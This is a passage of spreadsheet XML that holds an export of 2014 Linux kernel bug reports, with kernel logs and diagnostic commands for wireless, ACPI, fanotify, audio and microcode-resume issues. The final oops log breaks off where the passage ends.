  </si>
  <si>
    <t>2014-10-20 06:25 UTC</t>
  </si>
  <si>
    <t>After updating kernel 3.16 -&gt; 3.17 I'm getting followed warning on Lenovo t440p machine: 430.914690] ------------[ cut here ]------------ [ 430.914703] WARNING: CPU: 0 PID: 3946 at drivers/net/wireless/iwlwifi/mvm/tx.c:190 iwl_mvm_set_tx_params+0x60a/0x6f0 [iwlmvm]() [ 430.914704] Got an HT rate for a non data frame 0x8 [ 430.914704] Modules linked in: hid_generic hid_microsoft usbhid hid snd_usb_audio snd_usbmidi_lib snd_rawmidi snd_seq_device xhci_hcd tun ctr ccm bnep acpi_call(O) nfsd auth_rpcgss oid_registry nfs_acl nfs lockd fscache sunrpc nls_utf8 nls_cp437 vfat fat snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi arc4 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core btusb v4l2_common bluetooth videodev iwlmvm media mac80211 iwlwifi iTCO_wdt joydev iTCO_vendor_support x86_pkg_temp_thermal intel_powerclamp snd_hda_intel snd_hda_controller intel_rapl snd_hda_codec cfg80211 i915 snd_hwdep coretemp thinkpad_acpi snd_pcm nvram kvm_intel kvm rfkill snd_timer snd psmouse soundcore mei_me mei rtsx_pci_ms evdev rtc_efi drm_kms_helper serio_raw memstick pcspkr efivars ie31200_edac drm edac_core [ 430.914730] i2c_algo_bit tpm_tis shpchp tpm i2c_i801 lpc_ich video battery ac processor wmi button i2c_dev i2c_core fuse parport_pc ppdev lp parport autofs4 algif_skcipher af_alg dm_crypt dm_mod uhci_hcd ohci_hcd usb_storage ext4 crc16 mbcache jbd2 sg sd_mod sr_mod crc_t10dif cdrom crct10dif_generic rtsx_pci_sdmmc mmc_core crct10dif_pclmul crct10dif_common crc32_pclmul crc32c_intel ghash_clmulni_intel ahci libahci ehci_pci libata aesni_intel ehci_hcd aes_x86_64 lrw gf128mul glue_helper ablk_helper e1000e cryptd rtsx_pci ptp scsi_mod mfd_core usbcore pps_core usb_common thermal thermal_sys [last unloaded: xhci_hcd] [ 430.914753] CPU: 0 PID: 3946 Comm: wpa_supplicant Tainted: G O 3.17.0+ #6 [ 430.914754] Hardware name: LENOVO 20ANCTO1WW/20ANCTO1WW, BIOS GLET71WW (2.25 ) 07/02/2014 [ 430.914755] 0000000000000009 ffffffff814fa911 ffff8804288db8f8 ffffffff81064f52 [ 430.914756] 0000000000001808 ffff8804288db948 ffff88040add8660 ffff8804291b5600 [ 430.914758] 0000000000000000 ffffffff81064fb7 ffffffffa07b73d0 0000000000000020 [ 430.914759] Call Trace: [ 430.914763] [&lt;ffffffff814fa911&gt;] ? dump_stack+0x41/0x51 [ 430.914775] [&lt;ffffffff81064f52&gt;] ? warn_slowpath_common+0x72/0x90 [ 430.914777] [&lt;ffffffff81064fb7&gt;] ? warn_slowpath_fmt+0x47/0x50 [ 430.914780] [&lt;ffffffffa07a39ea&gt;] ? iwl_mvm_set_tx_params+0x60a/0x6f0 [iwlmvm] [ 430.914783] [&lt;ffffffffa07a3cf8&gt;] ? iwl_mvm_tx_skb+0x48/0x3c0 [iwlmvm] [ 430.914785] [&lt;ffffffffa079cb9b&gt;] ? iwl_mvm_mac_tx+0x7b/0x180 [iwlmvm] [ 430.914791] [&lt;ffffffffa0746ce9&gt;] ? __ieee80211_tx+0x2b9/0x3c0 [mac80211] [ 430.914795] [&lt;ffffffffa07492f3&gt;] ? ieee80211_tx+0xb3/0x100 [mac80211] [ 430.914799] [&lt;ffffffffa0749c49&gt;] ? ieee80211_subif_start_xmit+0x459/0xca0 [mac80211] [ 430.914803] [&lt;ffffffff814116e7&gt;] ? dev_hard_start_xmit+0x337/0x5f0 [ 430.914805] [&lt;ffffffff81430d46&gt;] ? sch_direct_xmit+0x96/0x1f0 [ 430.914806] [&lt;ffffffff81411ba3&gt;] ? __dev_queue_xmit+0x203/0x4f0 [ 430.914809] [&lt;ffffffff8142f670&gt;] ? ether_setup+0x70/0x70 [ 430.914811] [&lt;ffffffff814e96a1&gt;] ? packet_sendmsg+0xf81/0x1110 [ 430.914814] [&lt;ffffffff8140625c&gt;] ? skb_free_datagram+0xc/0x40 [ 430.914816] [&lt;ffffffff813f7538&gt;] ? sock_sendmsg+0x88/0xc0 [ 430.914818] [&lt;ffffffff813f7274&gt;] ? move_addr_to_kernel.part.20+0x14/0x60 [ 430.914820] [&lt;ffffffff811c47c2&gt;] ? __inode_wait_for_writeback+0x62/0xb0 [ 430.914821] [&lt;ffffffff813f7a91&gt;] ? SYSC_sendto+0xf1/0x180 [ 430.914823] [&lt;ffffffff813f88f9&gt;] ? __sys_recvmsg+0x39/0x70 [ 430.914825] [&lt;ffffffff8150066d&gt;] ? system_call_fastpath+0x1a/0x1f [ 430.914826] ---[ end trace cc19a150d311fc63 ]--- Tried with two different AP. 04:00.0 Network controller: Intel Corporation Wireless 7260 (rev 83) When this happens, everything seems to be working fine. dmesg attached.</t>
  </si>
  <si>
    <t>Acer Aspire E5-511 ACPI problems</t>
  </si>
  <si>
    <t>2014-10-09 00:43 UTC</t>
  </si>
  <si>
    <t>untaintableangel</t>
  </si>
  <si>
    <t>2016-08-10 15:43 UTC</t>
  </si>
  <si>
    <t>Created attachment 152971 [details] lspci.txt Greetings! New laptop and suffers a few ACPI issues on linux. OS: Ubuntu 14.10 64bit Current kernel: 3.17.0-031700-generic #201410060605 SMP Mon Oct 6 10:07:09 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux (from ubuntu mainline) (also running ubuntu 14.10's latest default based on 3.16.3 ("3.16.0.21.22") Laptop: Acer Aspire E5-511, with latest BIOS (v1.03) To be attached: lspci.txt dmidecode.txt result of 'sudo acpidump' Booting is very temperamental, and i can't get it to hibernate/suspend without becoming totally non-responsive to get the /var/log/kern.log.0 file. However, these are the results of debugging boot parameters: acpi=off boots but with fans constantly going acpi=ht boots, fan behaves itself pci=noacpi doesn't boot, hangs on garbled text acpi=noirq boots but then hangs on plymouth splash pnpacpi=off boots and behaves itself reasonably (currently using this) noapic xor nolapic neither boot /proc/acpi/fan and /proc/acpi/thermal_zone/*/trip_points via 'cat' are both empty. Recurring error messages printed: dw_dmac INTL9C60:00: invalid resource (for anything with the power button?) and the following with the latter acpi debugging parameters: "SCI (ACPI GSI 9) not registered" and "i2c_designware 80860F41:02 failure requesting irq 34" "i2c_designware 80860F41:05 failure requesting irq 37"</t>
  </si>
  <si>
    <t>iwlwifi: 7260: 0x00000034 | NMI_INTERRUPT_WDG - INIT image - MWG100220470</t>
  </si>
  <si>
    <t>3.17-rc7</t>
  </si>
  <si>
    <t>2014-10-14 10:11 UTC</t>
  </si>
  <si>
    <t>2014-11-03 13:31 UTC</t>
  </si>
  <si>
    <t>Every once in a while, the wireless driver (iwlwifi) prints "Microcode SW error detected" during boot (I will attached a full dmesg). In this case, the wireless card is not detected properly, not shown by "ip addr" nor by NetworkManager. I never saw this appear with kernels up to 3.14, I see it fairly often with the 3.16 Debian kernel, and it still happens occasionally with 3.17-rc7 vanilla. Sometimes, it seems to be "stuck" in that state, so even booting into an older kernel, the error will still appear. No amount of cold-rebooting or even pulling out the battery will fix this. In any case, I can run the command sudo modprobe -r iwlmvm &amp;&amp; sudo modprobe -r iwlwifi &amp;&amp; sudo modprobe iwlwifi to make it load properly. This also seems to "reset" the "stuck" state. In other words, now doing a reboot to a 3.14 or older reliably brings the card up on boot. So the only time I saw this failure with &lt;=3.14 on boot was if the same failure was already shown on the previous boot, and I did *not* re-load the module to fix that. With 3.16+, the bug can happen even if the previous boot was fine. That's why I consider this a regression. I reported this bug against Debian as well, and another user seems to have the same issue: &lt;https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=763172&gt; Here's what lspci has to say about the card: 03:00.0 Network controller: Intel Corporation Wireless 7260 (rev 73) Subsystem: Intel Corporation Dual Band Wireless-AC 7260 Flags: bus master, fast devsel, latency 0, IRQ 34 Memory at ddc00000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [40] Express Endpoint, MSI 00 Capabilities: [100] Advanced Error Reporting Capabilities: [140] Device Serial Number fc-f8-ae-ff-ff-51-88-9e Capabilities: [14c] Latency Tolerance Reporting Capabilities: [154] Vendor Specific Information: ID=cafe Rev=1 Len=014 &lt;?&gt; Kernel driver in use: iwlwifi The Debian package firmware-iwlwifi is at version 0.43 (whatever that means). Curiously, the dmesg says [ 12.055632] iwlwifi 0000:03:00.0: Direct firmware load for iwlwifi-7260-10.ucode failed with error -2 [ 12.058021] iwlwifi 0000:03:00.0: loaded firmware version 23.214.9.0 op_mode iwlmvm I assume this means that it didn't find the -10 ucode (which, according to &lt;http://wireless.kernel.org/en/users/Drivers/iwlwifi&gt;, is still experimental), and then falls back to the -9? The following ucodes for the 7260 exist on my disk: $ ls /lib/firmware/iwlwifi-7260-* -l -rw-r--r-- 1 root root 683236 Jun 16 01:51 /lib/firmware/iwlwifi-7260-7.ucode -rw-r--r-- 1 root root 679780 Jun 16 01:51 /lib/firmware/iwlwifi-7260-8.ucode -rw-r--r-- 1 root root 679380 Jun 16 01:51 /lib/firmware/iwlwifi-7260-9.ucode</t>
  </si>
  <si>
    <t>iwlwifi: Packet loss with Intel Wireless 6300 and background scanning</t>
  </si>
  <si>
    <t>3.15.1-1</t>
  </si>
  <si>
    <t>2014-10-15 14:42 UTC</t>
  </si>
  <si>
    <t>Bill Bluescreen</t>
  </si>
  <si>
    <t>2014-10-27 06:22 UTC</t>
  </si>
  <si>
    <t>After applying the proposed patch from Bug #56581, comment #154 , I experience 1~2% packet loss (measured with udp/iperf) at excellent signal conditions in 5GHz n-Network. mac80211 was loaded with missed_beacon_count=1000. The function iwlagn_mac_flush gets still called and by further testing I found out that this is related to background scanning by wpa_supplicant. When background scanning is turned off, iwlagn_mac_flush isn't called any more and no package loss does occur. Later I will add a stack dump.</t>
  </si>
  <si>
    <t>Kernel panic when using nmap</t>
  </si>
  <si>
    <t>3.17.1</t>
  </si>
  <si>
    <t>2014-10-19 15:02 UTC</t>
  </si>
  <si>
    <t>2014-10-28 05:40 UTC</t>
  </si>
  <si>
    <t>Created attachment 154181 [details] Crash log #1 Strange crash appears the second time this day for me, when I starting nmap for scanning. Couldn't find any dependency. Anyway, dumps attached.</t>
  </si>
  <si>
    <t>iwlwifi dvm - hardware rfkill unblock doesn't work (x230) - MWG100221081</t>
  </si>
  <si>
    <t>3.17.2</t>
  </si>
  <si>
    <t>2014-10-30 21:57 UTC</t>
  </si>
  <si>
    <t>2014-11-30 15:36 UTC</t>
  </si>
  <si>
    <t>How to reproduce: # rfkill list wlan 3: phy1: Wireless LAN Soft blocked: no Hard blocked: no % Enable RFKILL with hardware switch # rfkill list wlan 3: phy1: Wireless LAN Soft blocked: no Hard blocked: yes % Disable RFKILL with hardware switch # rfkill list wlan 3: phy1: Wireless LAN Soft blocked: no Hard blocked: yes # rmmod iwldvm iwlwifi # modprobe iwlwifi # rfkill list wlan 4: phy2: Wireless LAN Soft blocked: no Hard blocked: no</t>
  </si>
  <si>
    <t>fanotify: ignore marks not respected</t>
  </si>
  <si>
    <t>2014-11-04 18:48 UTC</t>
  </si>
  <si>
    <t>2014-11-07 18:51 UTC</t>
  </si>
  <si>
    <t>Created attachment 156521 [details] Example showing the incorrect behavior The fanotify API allows to mark mounts, directories, and files for notification. Furthermore it allows to create marks with an ignore mask to indicate which events shall be ignored. Function fsnotify_add_inode_mark() stores marks for inodes as list in attribute i_list of the inode. The list is sorted by priority and group. Function fsnotify_add_vfsmount_mark() stores marks for mounts as list in attribute m_list of the vfsmount. The list is sorted by priority and group. If an event occurs function fsnotify() is called. This function loops over all mount and inode marks and sends the event to the group using function send_to_group(). For an event and a group both an inode mark and a vfsmount mark may coexist. E.g. a user program may want to monitor one mount for FAN_MODIFY events but wants to ignore FAN_MODIFY events for some file. If for an event and a group both an inode mark and a vfsmount mark exist it is important to call send_to_group for both marks as once. Otherwise ignore masks bits set on the one mark cannot be considered for the other mark. Function fsnotify() assumes that m_list and i_list are sorted by group and ignores the sorting by priority. Hence some ignore marks may not be correctly considered. The attachement contains an example demonstrating this behavior. In the example 9 fanotify groups are created. Each watches the same mount. For six of the groups an ignore inode mark for a file is created. Hence only 3 groups should receive events for changes to the ignored file. When the example code is run repeatedly the number of groups for which events are thrown varies randomly. The result depends on the memory addresses assigned to newly assigned groups.</t>
  </si>
  <si>
    <t>Wacom Graphire2: system hang during boot</t>
  </si>
  <si>
    <t>2014-11-05 20:38 UTC</t>
  </si>
  <si>
    <t>2015-07-13 12:50 UTC</t>
  </si>
  <si>
    <t>Hello, If a graphire2 is attached to my laptop during boot, the boot process will hang indefinitely while starting acpid. If I disable acpid the boot process will continue until X is to be started, which at some point is hanging too, leaving me with a blank screen and no keyboard control except for magic sysreg key. Removing the graphire2 at this point does not change a thing. This happens since kernel 3.17, including 3.17.2. An strace on acpid revealed it was opening /dev/input/event9 (which belonged to the graphire2) as its last action. However, the laptop is booting without problems if the graphire2 is unplugged during boot. Then, if I plug in the graphire2 after xdm is started, it is recognized and working as it should be - at least with kernel 3.17.2.</t>
  </si>
  <si>
    <t>[BDW][Audio][ADSP Analog]Sound can be heared both from left and right speaker when do the single speaker channel test</t>
  </si>
  <si>
    <t>3.18.0-rc3</t>
  </si>
  <si>
    <t>2014-11-06 02:12 UTC</t>
  </si>
  <si>
    <t>jinliangx.wang</t>
  </si>
  <si>
    <t>2014-11-07 05:46 UTC</t>
  </si>
  <si>
    <t>Test environment: Hardware Platform: Wilson Beach SDS CPU: Broadwell U D0 Chipset PCH: Wildcat Point–LP Audio card: ALC286S Software Linux distribution: Ubuntu 14.04 64 bits Kernel: 3.18.0-rc3 asoc git://git.kernel.org/pub/scm/linux/kernel/git/broonie/sound.git branch: for-next commit id: 3dc776d51123a56abd955979247df921d7437ef3 BIOS: v87.0 (BDW-E1R1.86c.0087.R00.1407272122) FW: CoE: 8.4.1.61 Kernel code is from Mark Brown's tree Bug description is: I can hear sound both from left and right speaker when do the single speaker channel test. Command: speaker-test -D hw:broadwellrt286,0 -c 2 -t wav -s 1 Accepted result: Can hear sound "front left" from left speaker Actually result: Can hear sound "front left" both from left and right speaker Command: speaker-test -D hw:broadwellrt286,0 -c 2 -t wav -s 2 Accepted result: Can hear sound "front right" from right speaker Actually result: Can hear sound "front right" both from left and right speaker</t>
  </si>
  <si>
    <t>PowerEdge R220 boot fail in 32-bit OS unless acpi=off</t>
  </si>
  <si>
    <t>2014-11-10 04:45 UTC</t>
  </si>
  <si>
    <t>sialnije</t>
  </si>
  <si>
    <t>2015-05-18 02:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 157101 [details] acpidump, iomem, fwts report R220 is a relatively new platform. 64-bit OS'es work fine with this box. Unfortunately our product line is locked to 32-bit and 32 bit OS just can't boot in this box. Kernel versions I have tried: 3.0.23, 3.10.52, 3.13.0. All recent versions of Debian and CentOS running 2.6.x also crash the same way. Besides acpi=off, I have tried: apci_osi=! acpi_osi=Linux pci=noacpi Didn't help. Currently I have installed Ubuntu 14.0.4 desktop in this box. When I tried to run acpidump version 20140214, it gave this error: -------------------------------------------- Cannot open directory - /sys/firmware/acpi/tables/dynamic Could not get ACPI tables, AE_NOT_FOUND -------------------------------------------- The acpidump attached was collected with acpidump version 20100513-3 when Debian was installed with kernel version 3.10.52. I hope the output is still valid. Also include output from fwts, in case it may be helpful. The backtrace captured on serial port: [ 0.125965] BUG: unable to handle kernel paging request at 6241fff4 [ 0.132979] IP: [&lt;c138576e&gt;] acpi_ex_system_memory_space_handler+0x19a/0x1ed [ 0.140859] *pdpt = 0000000000000000 *pde = 0000000000000000 [ 0.147287] Oops: 0000 [#1] SMP [ 0.150905] Modules linked in: [ 0.154319] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 3.13.0-32-generic #57-u [ 0.162763] Hardware name: Dell Inc. PowerEdge R220/081N4V, BIOS 1.1.4 05/064 [ 0.171109] task: f74d0000 ti: f749e000 task.ti: f749e000 [ 0.177131] EIP: 0060:[&lt;c138576e&gt;] EFLAGS: 00010246 CPU: 0 [ 0.183249] EIP is at acpi_ex_system_memory_space_handler+0x19a/0x1ed [ 0.190433] EAX: 6241fff4 EBX: 00000020 ECX: 0000000c EDX: f74024a0 [ 0.197422] ESI: 00000000 EDI: f749fbc8 EBP: f749fae4 ESP: f749faa8 [ 0.204411] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 [ 0.210431] CR0: 80050033 CR2: 6241fff4 CR3: 01a99000 CR4: 001407f0 [ 0.217420] DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 [ 0.224409] DR6: fffe0ff0 DR7: 00000400 [ 0.228684] Stack: [ 0.230924] f74d0000 f749fab4 c136e190 c137fb6b 00000014 c137fb6b 00000000 0 [ 0.239635] 00000000 0000000c 00000000 fffffff4 f7439060 f748bb70 c13855d4 4 [ 0.248342] c137f6c2 f749fbc8 00000000 f7753140 00000000 ffffffff f749fc2c 0 [ 0.257052] Call Trace: [ 0.259780] [&lt;c136e190&gt;] ? acpi_os_signal_semaphore+0x1f/0x2c [ 0.266292] [&lt;c137fb6b&gt;] ? acpi_ev_system_memory_region_setup+0x60/0x7e [ 0.273773] [&lt;c137fb6b&gt;] ? acpi_ev_system_memory_region_setup+0x60/0x7e [ 0.281247] [&lt;c13855d4&gt;] ? acpi_ex_do_logical_op+0x15f/0x15f [ 0.287656] [&lt;c137f6c2&gt;] acpi_ev_address_space_dispatch+0x19c/0x1ee [ 0.294745] [&lt;c1382721&gt;] acpi_ex_access_region+0x1e0/0x269 [ 0.300960] [&lt;c1382b7a&gt;] acpi_ex_field_datum_io+0x108/0x1ce [ 0.307273] [&lt;c1382cbe&gt;] acpi_ex_write_with_update_rule+0x7e/0xf3 [ 0.314167] [&lt;c1382721&gt;] ? acpi_ex_access_region+0x1e0/0x269 [ 0.320576] [&lt;c1382a5a&gt;] acpi_ex_insert_into_field+0x2b0/0x2c8 [ 0.327180] [&lt;c138251e&gt;] acpi_ex_write_data_to_field+0x18e/0x1b1 [ 0.333978] [&lt;c1393842&gt;] ? acpi_ut_allocate_object_desc_dbg+0x3a/0x66 [ 0.341263] [&lt;c138648f&gt;] acpi_ex_store_object_to_node+0x9f/0xb2 [ 0.347962] [&lt;c138655c&gt;] acpi_ex_store+0xba/0x216 [ 0.353304] [&lt;c1383c29&gt;] acpi_ex_opcode_1A_1T_1R+0x426/0x53a [ 0.359712] [&lt;c13860d3&gt;] ? acpi_ex_resolve_operands+0x1db/0x4c2 [ 0.366414] [&lt;c137c7f5&gt;] acpi_ds_exec_end_op+0xc4/0x3a5 [ 0.372340] [&lt;c138cc62&gt;] ? acpi_ps_get_next_arg+0x300/0x35f [ 0.378651] [&lt;c138de21&gt;] ? acpi_ps_append_arg+0x1e/0x7f [ 0.384577] [&lt;c138d158&gt;] acpi_ps_parse_loop+0x497/0x4d3 [ 0.390501] [&lt;c137adfc&gt;] ? acpi_ds_call_control_method+0xe8/0x154 [ 0.397394] [&lt;c138daaf&gt;] acpi_ps_parse_aml+0x8a/0x23c [ 0.403125] [&lt;c138e1fc&gt;] acpi_ps_execute_method+0x19e/0x23c [ 0.409437] [&lt;c13892b2&gt;] acpi_ns_evaluate+0x1b8/0x243 [ 0.415169] [&lt;c13920b2&gt;] ? acpi_ut_remove_reference+0x2a/0x2d [ 0.421675] [&lt;c139294c&gt;] ? acpi_ut_execute_STA+0x46/0x4e [ 0.427697] [&lt;c13895fb&gt;] acpi_ns_init_one_device+0x7a/0x9f [ 0.433914] [&lt;c138b74f&gt;] acpi_ns_walk_namespace+0xb9/0x16b [ 0.440130] [&lt;c1389140&gt;] ? acpi_ns_evaluate+0x46/0x243 [ 0.445959] [&lt;c13897ce&gt;] acpi_ns_initialize_devices+0xed/0x13b [ 0.452562] [&lt;c1389581&gt;] ? acpi_ns_init_one_object+0xf4/0xf4 [ 0.458974] [&lt;c19f3545&gt;] ? acpi_sleep_proc_init+0x2e/0x2e [ 0.465094] [&lt;c19f4c8b&gt;] acpi_initialize_objects+0x34/0x47 [ 0.471311] [&lt;c19f35cd&gt;] acpi_init+0x88/0x257 [ 0.476266] [&lt;c140c9c4&gt;] ? __class_create+0x44/0x70 [ 0.481799] [&lt;c19f1fd5&gt;] ? rio_bus_init+0x2a/0x2a [ 0.487143] [&lt;c19f2041&gt;] ? fbmem_init+0x6c/0x96 [ 0.492292] [&lt;c1002122&gt;] do_one_initcall+0xd2/0x190 [ 0.497831] [&lt;c11d183b&gt;] ? __proc_create+0x9b/0xd0 [ 0.503271] [&lt;c1073168&gt;] ? parameq+0x18/0x70 [ 0.508135] [&lt;c19b4500&gt;] ? do_early_param+0x54/0x78 [ 0.513671] [&lt;c10733f9&gt;] ? parse_args+0x239/0x420 [ 0.519014] [&lt;c1090eff&gt;] ? __wake_up+0x3f/0x50 [ 0.524066] [&lt;c19b4c46&gt;] kernel_init_freeable+0x14f/0x1e6 [ 0.530184] [&lt;c19b4524&gt;] ? do_early_param+0x78/0x78 [ 0.535722] [&lt;c1647060&gt;] kernel_init+0x10/0x100 [ 0.540871] [&lt;c165ef37&gt;] ret_from_kernel_thread+0x1b/0x28 [ 0.546991] [&lt;c1647050&gt;] ? rest_init+0x70/0x70 [ 0.552045] [&lt;c13c3e73&gt;] ? tty_devnum+0x3/0x20 [ 0.557097] Code: 00 00 74 22 77 0a 83 fb 08 75 69 0f b6 00 eb 1d 83 fb 20 73 [ 0.578613] EIP: [&lt;c138576e&gt;] acpi_ex_system_memory_space_handler+0x19a/0x1e8 [ 0.588627] CR2: 000000006241fff4 [ 0.592324] ---[ end trace b9a45f0f2891d2c1 ]--- [ 0.597484] Kernel panic - not syncing: Attempted to kill init! exitcode=0x09 [ 0.597484]</t>
  </si>
  <si>
    <t>Microcode-update not re-applied to boot-CPU after resume from suspend</t>
  </si>
  <si>
    <t>3.17.2-1-ARCH</t>
  </si>
  <si>
    <t>2014-11-10 20:44 UTC</t>
  </si>
  <si>
    <t>alex.schnaidt</t>
  </si>
  <si>
    <t>2014-11-14 21:24 UTC</t>
  </si>
  <si>
    <t>In the wake of the Intel TSX bug and the release of the microcode-update one issue cropped up post-resume. The microcode-update is not re-applied to cpu0. On SMP systems this results in cpu0 having TSX instructions enabled and the remaining cpus having them disabled by the microcode-update. # dmesg | grep microcode [ 0.000000] CPU0 microcode updated early to revision 0x1c, date = 2014-07-03 [ 0.093040] CPU1 microcode updated early to revision 0x1c, date = 2014-07-03 [ 0.113650] CPU2 microcode updated early to revision 0x1c, date = 2014-07-03 [ 0.134293] CPU3 microcode updated early to revision 0x1c, date = 2014-07-03 [ 0.345610] microcode: CPU0 sig=0x306c3, pf=0x2, revision=0x1c [ 0.345615] microcode: CPU1 sig=0x306c3, pf=0x2, revision=0x1c [ 0.345620] microcode: CPU2 sig=0x306c3, pf=0x2, revision=0x1c [ 0.345623] microcode: CPU3 sig=0x306c3, pf=0x2, revision=0x1c [ 0.345654] microcode: Microcode Update Driver: v2.00 &lt;tigran@aivazian.fsnet.co.uk&gt;, Peter Oruba &lt;SUSPEND&gt; [ 79.131245] CPU1 microcode updated early to revision 0x1c, date = 2014-07-03 [ 79.145367] CPU2 microcode updated early to revision 0x1c, date = 2014-07-03 [ 79.159411] CPU3 microcode updated early to revision 0x1c, date = 2014-07-03 dmesg confirms that cpu0 doesn't receive the update on resume but the kernel is unaware of this and still reports the same microcode version for all cpus (or cores): # cat /sys/devices/system/cpu/cpu*/microcode/version 0x1c 0x1c 0x1c 0x1c Furthermore, /proc/cpuinfo reports that the TSX instructions HLE and RTM are still disabled. Probing the capabilities directly pre-suspend: # cpuid | grep HLE HLE hardware lock elision = false HLE hardware lock elision = false HLE hardware lock elision = false HLE hardware lock elision = false And post-resume: # cpuid | grep HLE HLE hardware lock elision = true HLE hardware lock elision = false HLE hardware lock elision = false HLE hardware lock elision = false Since glibc doesn't rely on the kernel, but probes the instructions directly, following can happen: a) An application is started and the glibc code for instruction-detection is run on cpu0 b) TSX is detected and the codepaths using HLE/RTM go live c) The application's process is moved to another cpu (with TSX disabled) d) The process receives SIGILL in libpthread and is terminated Bringing cpu0 off- and back online, effectively re-applying the update, gets the system back into a usable state: # echo 0 &gt; /sys/devices/system/cpu/cpu0/online # echo 1 &gt; /sys/devices/system/cpu/cpu0/online # cpuid | grep HLE HLE hardware lock elision = false HLE hardware lock elision = false HLE hardware lock elision = false HLE hardware lock elision = false Since cpu0 is special-cased on suspend and doesn't follow the regular hotplug routine it seems to not receive the microcode update on resume. Downstream report: https://bugs.archlinux.org/task/42689 https://bbs.archlinux.org/viewtopic.php?pid=1472766</t>
  </si>
  <si>
    <t>2014-11-18 08:02 UTC</t>
  </si>
  <si>
    <t>2014-12-09 09:54 UTC</t>
  </si>
  <si>
    <t>Kernel 3.17.2 64 bits GCC 4.8.3 Slackware64 14.1 Core i7 / 6GB RAM I've got this bug just after resuming from suspend to memory. It may be related to ath9k driver since it is surrounded by ath logs: hid-generic 0003:045E:0745.000F: input,hiddev0,hidraw2: USB HID v1.11 Device [Microsoft Microsoft ® Nano Transceiver v2.0] on usb-0000:00:1d.0-1.2/input2 ath: phy0: Set channel: 2422 MHz width: 0 ath: phy0: Reset to 2422 MHz, HT40: 0 fastcc: 1 ath: phy0: FastChannelChange for 2417 -&gt; 2422 BUG: unable to handle kernel paging request at ffffeb0400564d40 IP: [&lt;ffffffff81133453&gt;] kfree+0x43/0x110 PGD 0 Oops: 0000 [#1] PREEMPT SMP Modules linked in: ath9k ath9k_common ath9k_hw ath CPU: 6 PID: 2292 Comm: acpid Not tainted 3.17.2 #9 Hardware name: Acer Aspire 7750G/JE70_HR, BIOS V1.07 03/02/2011 task: ffff8800ab27a580 ti: ffff8801c5a68000 task.ti: ffff8801c5a68000 RIP: 0010:[&lt;ffffffff81133453&gt;] [&lt;ffffffff81133453&gt;] kfree+0x43/0x110 RSP: 0018:ffff8801c5a6bc28 EFLAGS: 00010282 RAX: ffffeb0400564d40 RBX: ffffc90015935000 RCX: 00000000c0000100 RDX: ffffea0000000000 RSI: ffff8800ab27a580 RDI: ffffc90015935000 RBP: ffff8801c5a6bc38 R08: ffff8801c5a68000 R09: 00000000ffffffff R10: 0000000000000c63 R11: 0000000000000000 R12: ffff88007f3da080 R13: ffff88007f3da000 R14: ffff8801398c3758 R15: ffff88007f3da338 FS: 00007f30d8dd3740(0000) GS:ffff8801cf580000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffeb0400564d40 CR3: 00000001c6596000 CR4: 00000000000407e0 Stack: ffffc90015935000 ffff88007f3da080 ffff8801c5a6bc80 ffffffff8158a800 ffff8801a8c16500 ffff8800fffffff0 ffff88007f3da338 ffff8801398c3758 ffff8801a8c16500 ffffffff81942020 0000000000008800 ffff8801c5a6bcb8 Call Trace: [&lt;ffffffff8158a800&gt;] evdev_open+0x140/0x1f0 [&lt;ffffffff8113db3a&gt;] chrdev_open+0x9a/0x1d0 [&lt;ffffffff8113daa0&gt;] ? cdev_put+0x20/0x20 [&lt;ffffffff81137822&gt;] do_dentry_open.isra.16+0x1e2/0x320 [&lt;ffffffff81137a49&gt;] finish_open+0x19/0x30 [&lt;ffffffff81146252&gt;] do_last.isra.59+0x462/0xc50 [&lt;ffffffff81143e46&gt;] ? link_path_walk+0x246/0x890 [&lt;ffffffff81146af2&gt;] path_openat+0xb2/0x650 [&lt;ffffffff811334e0&gt;] ? kfree+0xd0/0x110 [&lt;ffffffff811481f5&gt;] do_filp_open+0x35/0x80 [&lt;ffffffff8115432f&gt;] ? __alloc_fd+0x9f/0x130 [&lt;ffffffff81138b34&gt;] do_sys_open+0x124/0x220 [&lt;ffffffff81138c49&gt;] SyS_open+0x19/0x20 [&lt;ffffffff8186b792&gt;] system_call_fastpath+0x16/0x1b Code: 77 00 00 b8 00 00 00 80 48 01 f8 48 0f 42 15 d5 2b a8 00 48 01 d0 48 ba 00 00 00 00 00 ea ff ff 48 c1 e8 0c 48 c1 e0 06 48 01 d0 &lt;48&gt; 8b 10 80 e6 80 0f 85 a4 00 00 00 49 89 c2 49 8b 02 a8 80 74 RIP [&lt;ffffffff81133453&gt;] kfree+0x43/0x110 RSP &lt;ffff8801c5a6bc28&gt; CR2: ffffeb0400564d40 ---[ end trace 578b34952646a910 ]--- ath: phy0: Set channel: 2427 MHz width: 0 ath: phy0: Reset to 2427 MHz, HT40: 0 fastcc: 1 ath: phy0: FastChannelChange for 2422 -&gt; 2427 ath: phy0: Set channel: 2432 MHz width: 0 ath: phy0: Reset to 2432 MHz, HT40: 0 fastcc: 0 ath: phy0: ah-&gt;misc_mode 0x4 ath: phy0: STA is not yet associated..skipping beacon config ath: phy0: Set channel: 2437 MHz width: 0 ath: phy0: Reset to 2437 MHz, HT40: 0 fastcc: 1 ath: phy0: FastChannelChange for 2432 -&gt; 2437 usb 3-2: new low-speed USB device number 6 using xhci_hcd ath: phy0: Set channel: 2442 MHz width: 0 ath: phy0: Reset to 2442 MHz, HT40: 0 fastcc: 1 ath: phy0: FastChannelChange for 2437 -&gt; 2442 ath: phy0: Set channel: 2447 MHz width: 0 ath: phy0: Reset to 2447 MHz, HT40: 0 fastcc: 1 ath: phy0: FastChannelChange for 2442 -&gt; 2447 ath: phy0: Set channel: 2452 MHz width: 0 ath: phy0: Reset to 2452 MHz, HT40: 0 fastcc: 1 ath: phy0: FastChannelChange for 2447 -&gt; 2452 usb 3-2: New USB device found, idVendor=413c, idProduct=2105 usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=0 usb 3-2: Product: Dell USB Keyboard ... After that, everything seems to work 